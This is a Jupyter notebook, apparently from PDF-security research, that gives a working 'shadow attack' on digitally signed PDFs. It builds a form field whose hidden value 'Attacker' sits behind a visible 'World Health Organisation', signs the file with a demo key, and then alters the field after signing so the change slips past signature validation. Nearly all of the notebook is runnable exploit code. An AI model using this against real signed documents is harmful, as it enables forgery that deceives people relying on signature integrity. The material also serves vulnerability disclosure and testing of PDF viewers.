# Step 0: Configuration Parameters

In [34]:
folder_path                     = "./../../../shadow-exploits/replace/forms/"
signer_path                     = "./../../../ressources/pdf-signer/"

input_file                      = "" # type the file name which you want to attack; if empty - a default PDF will be generated
shadowed_file                   = "replace-form-shadowed.pdf"
shadowed_file_signed            = "replace-form-shadowed-signed.pdf"
shadowed_file_signed_manipulated= "replace-form-shadowed-signed-manipulated.pdf"

formText2Manipulation           = "Attacker"
formText2Replace                = "World Health Organisation"

# Step 0.1: Create default PDF if no PDF file is provided as input

In [35]:
import fitz

if not input_file:
    input_file = "honest.pdf"
    doc = fitz.open()                      # new empty PDF
    doc.insertPage(0)                      # creates an ISO-A4 portrait page
    page = doc[-1]                         # this is the page
    # page.insertText(fitz.Point(72, 72),formText2Replace,fontname="tiro", fontsize = 14)
    
    widget = fitz.Widget()
    widget.field_type = fitz.PDF_WIDGET_TYPE_TEXT
    widget.rect = fitz.Rect(25,25,220,40)
    widget.field_name = "texfield1"
    widget.text_fontsize = 14
    widget.field_value = formText2Replace
    page.addWidget(widget)
    doc.save(folder_path+input_file)

# Step 1: Generating shadow document
The following script finds the form field which will be shadowed by searching its value (*formText2Replace*).
On the presentation level, the new document (*shadowed_file*) does not differ from the previous one (*input_file*).

In [36]:
import types
import os
import io
import re
import mmap
from random import choice
from string import ascii_lowercase
import PyPDF4 as pyPDF
from PyPDF4 import utils
from PyPDF4.generic import *
from PyPDF4.utils import *
from PyPDF4.pdf import *
import fitz
import shutil

pdf_reader = pyPDF.PdfFileReader(open(folder_path+input_file, mode="rb"))
list(pdf_reader.pages) # Process all the objects.
pdf_writer = pyPDF.PdfFileWriter()

def set_need_appearances_writer(writer: PdfFileWriter):
    try:
        catalog = writer._root_object
        # get the AcroForm tree
        if "/AcroForm" not in catalog:
            writer._root_object.update({
                NameObject("/AcroForm"): IndirectObject(len(writer._objects), 0, writer)})

        need_appearances = NameObject("/NeedAppearances")
        writer._root_object["/AcroForm"][need_appearances] = BooleanObject(True)
        return writer

    except Exception as e:
        print('set_need_appearances_writer() catch : ', repr(e))
        return writer

def update_field_values(writer: PdfFileWriter):
    fields = pdf_reader.getFields()
    changed_form_name = ""
    for key,val in fields.items():
        field = DictionaryObject(val)

        for key2, val2 in field.items():
            if val2 == formText2Replace:
                changed_form_name = field["/T"]
                field_dictionary = {key:formText2Manipulation}
                writer.updatePageFormFieldValues(writer.getPage(0),field_dictionary)
                try:
                    appearance = field.get('/AP').getObject().get('/N').getObject()
                    shadowed = appearance.getData().replace(bytes(formText2Manipulation,"ascii"), bytes(formText2Replace,"ascii"))
                    streamAP = DecodedStreamObject()
                    for key, val in appearance.items():
                        if key == "/Filter" or key == "/Length":
                            pass
                        else:
                            streamAP.update({key:val})
                    streamAP.setData(shadowed)
                    writer._addObject(streamAP)
                    field.get('/AP').getObject().update({"/N":streamAP})
                except:
                    pass
    return changed_form_name, writer

for pageNum in range(pdf_reader.numPages):
    pageObj = pdf_reader.getPage(pageNum)
    pdf_writer.addPage(pdf_reader.getPage(pageNum))
    changed_form_name, pdf_writer = update_field_values(pdf_writer)

with open(folder_path+shadowed_file, "wb") as filehandle_output:
    pdf_writer.write(filehandle_output)


In [37]:
os.system('java -jar '+signer_path+'pdfsigner.jar -i '+folder_path+shadowed_file+' -o '+folder_path+shadowed_file_signed+' -pkcs '+signer_path+'demo-rsa2048.p12 -password demo-rsa2048 -sigtype approval -sigview visible -sigimg '+signer_path+'PdfInsecurityTeam-Logo.png')

0

In [38]:
shutil.copyfile(folder_path+shadowed_file_signed, folder_path+shadowed_file_signed_manipulated)

doc = fitz.open(folder_path+shadowed_file_signed_manipulated)
for page in doc:
    for field in page.widgets():
        if field.field_name == changed_form_name:
            field.field_value = formText2Manipulation   
            field.update()
doc.saveIncr()